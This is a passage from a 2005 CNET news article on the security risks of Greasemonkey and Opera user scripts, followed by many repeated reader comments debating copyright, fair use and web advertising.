- Related Stories
-
Will Ajax help Google clean up?
March 17, 2005 -
Fight over 'forms' clouds future of Net applications
February 17, 2005 -
Firefox fortune hunters
November 17, 2004
(continued from previous page)
through lists of enticing scripts might fail to distinguish between malicious and benign code.
"A user JavaScript file can in no way harm your computer or stored data, but badly written files can slow down Opera, and malicious files can spy on your browsing," browser maker Opera warns in a Web posting about the new feature in its latest beta. "Never install and use a script library from someone you don't know and trust--if in doubt, post in the Opera forums, newsgroups or mailing lists and ask if the script you would like to use is well written and exploit-free."
User scripts also could facilitate password-stealing schemes, said security consultant Richard Smith, who runs the ComputerBytesMan Web site.
"The bad guys could likely create a script for stealing usernames and passwords in login forms using this tool," Smith said. "They would still need to break into someone's computer to install the script, but the tool would make the theft process much easier."
Aaron Boodman, the 26-year-old programmer in Seattle who wrote Greasemonkey, declined to comment on the extension or on its security implications.
But in a recent posting to his Web site, he acknowledged its security liabilities, and worried that Greasemonkey would become vulnerable as a result of its increasing notoriety.
"A hacker could create a script that does something users want, but also makes a call to the hacker's server, sending your cookies to that machine," Boodman wrote. "He could even scan for password fields and upload those...At this point, I'm only comfortable because the (Greasemonkey) community is relatively small and techie. It would be difficult for a hacker to distribute a malicious script in this environment."
In his posting, Boodman said he was open to ideas on improving Greasemonkey's security.
For now, he urged caution along the same lines that Opera did.
"All I can say is that just like any other software, you should think a tiny bit before installing a user script," Boodman wrote. "Make sure the author is someone you trust, or at least in a social network you trust."
See more CNET content tagged:
Web surfer, publisher, DHTML, extension, Firefox
http://dunck.us/anabasis/archives/2005/03/19/user-scripts-spreading-to-opera/
However, Greasemonkey was developed in a vacuum. I guess the conditions were right for this to be developed, and the two projects happened to overlap. IE implementation any day now...?
It sure is the most annoying!
It's whose, not who's!
http://dunck.us/anabasis/archives/2005/03/19/user-scripts-spreading-to-opera/
However, Greasemonkey was developed in a vacuum. I guess the conditions were right for this to be developed, and the two projects happened to overlap. IE implementation any day now...?
It sure is the most annoying!
It's whose, not who's!
More comments at mozillazine.org: http://www.mozillazine.org/talkback.html?article=6274
It is an important difference over bookmarklets; it's quite possible for someone to install a user script and not think about it as they browse.
Also, I tend to think of user scripts as extensions with a stricter security model (same as regular in-page JS security model).
More comments at mozillazine.org: http://www.mozillazine.org/talkback.html?article=6274
It is an important difference over bookmarklets; it's quite possible for someone to install a user script and not think about it as they browse.
Also, I tend to think of user scripts as extensions with a stricter security model (same as regular in-page JS security model).
I see a time coming very soom when things like this will result in law suites. It happened to Google for changing sites and I suspect that large sites with the money for the lawyers will be going after people that change their web sites. After all most of these sites rely on advertising and anything that messes with that is going to get slammed with law suites.
The 26 year that made Greasemonkey as well as Opera for adding such feature to thier browser directly needs to be gone after. I hope it happens and I hope they both loose greatly.
People and companies need to respect everyone's copyrighted material.
Robert
And those people who use babelfish translation tools to view my pages in French? Well, we already know how innately evil those Frenchies are. Sue 'em all, the bastards!
I heard there are even people using Microsoft's XP offline feature to MAKE COPIES OF MY WEB PAGES ON THEIR LAPTOPS for offline reading. How dare they! *I* own the copyright to my pages, and *I* dictate who can see them, how they can see them, and what they can do with them. No more adjusting fonts, no more Flash-removal bookmarklets, it's all evil evil evil.
Why? Because, as a Webmaster, I control the horiontal, I control the vertical! You... you are nothing but a peon visitor to my fine pages, and you do not have rights.
Got a problem with that? How 'bout I send the RIAA lawyers after you? Hrumph. Because I bet you're the same sort of scoundrel that makes MIX tapes for friends (those songs were NOT meant to be heard out of order... apart from their albums). You probably bastardize the sound of songs with an EQUALIZER, too. That's *NOT* how the artists intended their music to be listened to! It's not!!!
In fact, I'm talking with stereomakers right now to get those equalizer thingamabobs taken off.
MY CONTENT! It's MY CONTENT. Did you hear me?!?!?!?!!!!!!!11111
I dog-ear pages; I rip pages out of magazines; I cut articles from newspapers. Why shouldn't I be able to do similar things with web sites (change font size, pass it through a text-to-speech program, highlight sections, translate it to my native language).
DRM is not to protect copyright; don't let anyone tell you different. DRM removed fair use rights from the consumer.
So, if you're running the user script only for personal use, you're pretty legally secure. Yes, as someone pointed out, this is part of fair use doctrine.
The only legal exception I am aware of to fair use is the DMCA's prohibition against circumventing a copy-protection mechanism--but, then, that section of that law is flawed anyway.
Yes, the content may be your property, but if you want to dictate what others do with it for personal use, you have to wrap it in copy-protection that prevents them from using it in any way you don't like. If I'm remembering the DMCA's terminology correctly, this copy-protection must be technological in nature. Sorry, a legal notice won't work; you actually have to give them something to break through first.
By the way, I'm not a lawyer--I just read the text of these laws and agreements affecting copyright for my own research.
Did you know that satire is protected fair use? If I wanted, I could copy parts of your posts just to make fun of them in a satirical way . . . Fortunately, I'm not interested in doing that. I just thought I would point that out to explain your "ownership" only entitles you, and Hollywood and the RIAA, to so much. It's the major loophole they slipped past Congress in the DMCA that gives them so much control, but as I said, you need to use copy-protection to use that loophole.
P.S. Technically, circumventing copy protection for fair use purposes is legal--Congress invalidated this, though, by making it illegal to create any tool that circumvents copy-protection. It provides no exceptions for this part of the law, assuming I'm remembering correctly. Thus, effectively, since you generally need a tool to circumvent copy-protection, even fair use becomes illegal for copy-protected works. Boy, did Hollywood and the RIAA pull the wool over Congress's eyes on that one.
. . . and copyright holders need to return that respect by respecting the fair use rights of those people and companies. Both sides need to learn respect. Hollywood and the RIAA clearly have no respect for fair use, except when it benefits them. It's obvious you don't either, and you don't deserve any copyright you own until you learn that respect.
I see a time coming very soom when things like this will result in law suites. It happened to Google for changing sites and I suspect that large sites with the money for the lawyers will be going after people that change their web sites. After all most of these sites rely on advertising and anything that messes with that is going to get slammed with law suites.
The 26 year that made Greasemonkey as well as Opera for adding such feature to thier browser directly needs to be gone after. I hope it happens and I hope they both loose greatly.
People and companies need to respect everyone's copyrighted material.
Robert
And those people who use babelfish translation tools to view my pages in French? Well, we already know how innately evil those Frenchies are. Sue 'em all, the bastards!
I heard there are even people using Microsoft's XP offline feature to MAKE COPIES OF MY WEB PAGES ON THEIR LAPTOPS for offline reading. How dare they! *I* own the copyright to my pages, and *I* dictate who can see them, how they can see them, and what they can do with them. No more adjusting fonts, no more Flash-removal bookmarklets, it's all evil evil evil.
Why? Because, as a Webmaster, I control the horiontal, I control the vertical! You... you are nothing but a peon visitor to my fine pages, and you do not have rights.
Got a problem with that? How 'bout I send the RIAA lawyers after you? Hrumph. Because I bet you're the same sort of scoundrel that makes MIX tapes for friends (those songs were NOT meant to be heard out of order... apart from their albums). You probably bastardize the sound of songs with an EQUALIZER, too. That's *NOT* how the artists intended their music to be listened to! It's not!!!
In fact, I'm talking with stereomakers right now to get those equalizer thingamabobs taken off.
MY CONTENT! It's MY CONTENT. Did you hear me?!?!?!?!!!!!!!11111
I dog-ear pages; I rip pages out of magazines; I cut articles from newspapers. Why shouldn't I be able to do similar things with web sites (change font size, pass it through a text-to-speech program, highlight sections, translate it to my native language).
DRM is not to protect copyright; don't let anyone tell you different. DRM removed fair use rights from the consumer.
So, if you're running the user script only for personal use, you're pretty legally secure. Yes, as someone pointed out, this is part of fair use doctrine.
The only legal exception I am aware of to fair use is the DMCA's prohibition against circumventing a copy-protection mechanism--but, then, that section of that law is flawed anyway.
Yes, the content may be your property, but if you want to dictate what others do with it for personal use, you have to wrap it in copy-protection that prevents them from using it in any way you don't like. If I'm remembering the DMCA's terminology correctly, this copy-protection must be technological in nature. Sorry, a legal notice won't work; you actually have to give them something to break through first.
By the way, I'm not a lawyer--I just read the text of these laws and agreements affecting copyright for my own research.
Did you know that satire is protected fair use? If I wanted, I could copy parts of your posts just to make fun of them in a satirical way . . . Fortunately, I'm not interested in doing that. I just thought I would point that out to explain your "ownership" only entitles you, and Hollywood and the RIAA, to so much. It's the major loophole they slipped past Congress in the DMCA that gives them so much control, but as I said, you need to use copy-protection to use that loophole.
P.S. Technically, circumventing copy protection for fair use purposes is legal--Congress invalidated this, though, by making it illegal to create any tool that circumvents copy-protection. It provides no exceptions for this part of the law, assuming I'm remembering correctly. Thus, effectively, since you generally need a tool to circumvent copy-protection, even fair use becomes illegal for copy-protected works. Boy, did Hollywood and the RIAA pull the wool over Congress's eyes on that one.
. . . and copyright holders need to return that respect by respecting the fair use rights of those people and companies. Both sides need to learn respect. Hollywood and the RIAA clearly have no respect for fair use, except when it benefits them. It's obvious you don't either, and you don't deserve any copyright you own until you learn that respect.
What is up with the state of investigation on this site lately. Many basic errors that would take a few minutes of research to prevent!
Anything the user uses to intentionally change the content for their own use personal use should be fine. Like I said, you can do it yourself as long as you don't spread it around or show it to someone else, but I could see a judge say that helping someone do it by providing a tool is a violation. Hopefully, it would fail on appeal.
What is up with the state of investigation on this site lately. Many basic errors that would take a few minutes of research to prevent!
Anything the user uses to intentionally change the content for their own use personal use should be fine. Like I said, you can do it yourself as long as you don't spread it around or show it to someone else, but I could see a judge say that helping someone do it by providing a tool is a violation. Hopefully, it would fail on appeal.
I have to say I really don't think there is much that companies can do via litigation to stop or kill this kind of thing. Instead capitalists will do what they always have done and adapt.
http://russ.johnsonville.net/default.aspx?Page=Blog
I have to say I really don't think there is much that companies can do via litigation to stop or kill this kind of thing. Instead capitalists will do what they always have done and adapt.
http://russ.johnsonville.net/default.aspx?Page=Blog
Just wow. Where do you come from dude?
Just wow. Where do you come from dude?
If you don't like the terms of use, then leave. People don't have a right to free information.
I mean, it also says you can't "participate in the transfer or sale of . . . any of the materials or content or our sites in whole or in part." I understand sale of, but by receiving the content by viewing the sale, aren't you participating in the transfer of the content of the site in part?
Just because something is stated in the terms of use doesn't mean it is valid or legal. Clearly, viewing the web site is legal, and I doubt C-Net Networks would counter that position. I would even say you are legally secure saving one of these documents on your hard drive for later viewing, and even changing the content, as long as you're the only one who ever sees it.
Writing a user script and using it client side thus seems to be pretty hard to attack legally to me. Spreading a user script around, however, could be problematic, depending on what it does. That would have to be tested in court.
Riiiight, because that's not inane at all, is it?
If you don't like the terms of use, then leave. People don't have a right to free information.
I mean, it also says you can't "participate in the transfer or sale of . . . any of the materials or content or our sites in whole or in part." I understand sale of, but by receiving the content by viewing the sale, aren't you participating in the transfer of the content of the site in part?
Just because something is stated in the terms of use doesn't mean it is valid or legal. Clearly, viewing the web site is legal, and I doubt C-Net Networks would counter that position. I would even say you are legally secure saving one of these documents on your hard drive for later viewing, and even changing the content, as long as you're the only one who ever sees it.
Writing a user script and using it client side thus seems to be pretty hard to attack legally to me. Spreading a user script around, however, could be problematic, depending on what it does. That would have to be tested in court.
Riiiight, because that's not inane at all, is it?
Greasemonkey allows the end user to modify a web page on the client side only, as does google. But google wants to throw in ads and whatnot that might damage the website. Like putting amazon ads on a small online bookstores page. With grease monkey the user can alter the way he views it, and I doubt a user is going to add ads to a page through greasemonkey.
And no, this is not a copyright violation. If I used it to alter websites in some way, your web site has not been touched, nor does it affect your next visitor.
Greasemonkey allows the end user to modify a web page on the client side only, as does google. But google wants to throw in ads and whatnot that might damage the website. Like putting amazon ads on a small online bookstores page. With grease monkey the user can alter the way he views it, and I doubt a user is going to add ads to a page through greasemonkey.
And no, this is not a copyright violation. If I used it to alter websites in some way, your web site has not been touched, nor does it affect your next visitor.
No I do not want your cookies, (one site I've visited had eight)
NO I DO NOT WANT TO STRAIN MY EYES to read your supersmall obscure typeface
No I do not want your ads. I know how to use
Google and I can spell Wandangle Widget just fine so the next time I need one I can get it myself
......
Oh, and by the way, and if I do use Google I don't want your search engine hijacking my request
(I had a non search item pop-up generate because the site I went to had an ad for a similar unwanted item)
If I want a right-handed widget pole the last thing I need is an ad for left handed goose oil, let alone TWO ADS
SO
until you tell me truthfully what ALL is on your site I WILL USE WHATEVER MEANS to remove unwanted material
you sound like the spammers that intentionally misspell words so the spam filters will allow it to pass, anything so your content will be viewed
WELL there is an uprising and you WILL fall along with your intrusive ads and unwanted pop-ups and impossible to read type
SURFERS OF THE WEB UNITE!!!
Robert
No I do not want your cookies, (one site I've visited had eight)
NO I DO NOT WANT TO STRAIN MY EYES to read your supersmall obscure typeface
No I do not want your ads. I know how to use
Google and I can spell Wandangle Widget just fine so the next time I need one I can get it myself
......
Oh, and by the way, and if I do use Google I don't want your search engine hijacking my request
(I had a non search item pop-up generate because the site I went to had an ad for a similar unwanted item)
If I want a right-handed widget pole the last thing I need is an ad for left handed goose oil, let alone TWO ADS
SO
until you tell me truthfully what ALL is on your site I WILL USE WHATEVER MEANS to remove unwanted material
you sound like the spammers that intentionally misspell words so the spam filters will allow it to pass, anything so your content will be viewed
WELL there is an uprising and you WILL fall along with your intrusive ads and unwanted pop-ups and impossible to read type
SURFERS OF THE WEB UNITE!!!
Robert
The article seems to be focusing on the relatively mild security risk that someone might install a malicious user script onto their own computers. This, however, is a security risk that can be controlled really well just through a little bit of common sense. I don't believe that your data could be altered in any way, since a site such as yours would, I believe, make a custom HTML page on each request to return to the browser. I think this is all Greasemonkey could affect, and thus, you are safe on your end.
- What about database-based web site? Are they vulnerable too?
- by March 28, 2005 6:39 AM PST
- What about dynamic database-based websites, rather than static HTML websites? Can the Firefox extension alter those websites as well? Are dynamic websites also vulnerable to the security issues raised by this browser extension?
- Like this Reply to this comment
-
-
- I would doubt it . . .
- by March 28, 2005 4:10 PM PST
- Greasemonkey, as I understand it, and others have confirmed to me, only operates on the client side. The security risk seems pretty mild, thus, as it can only affect what the client sees. It can't alter anything on your server side, so it's safe.
- Like this
-
Showing 1 of 2 pages (98 Comments)The article seems to be focusing on the relatively mild security risk that someone might install a malicious user script onto their own computers. This, however, is a security risk that can be controlled really well just through a little bit of common sense. I don't believe that your data could be altered in any way, since a site such as yours would, I believe, make a custom HTML page on each request to return to the browser. I think this is all Greasemonkey could affect, and thus, you are safe on your end.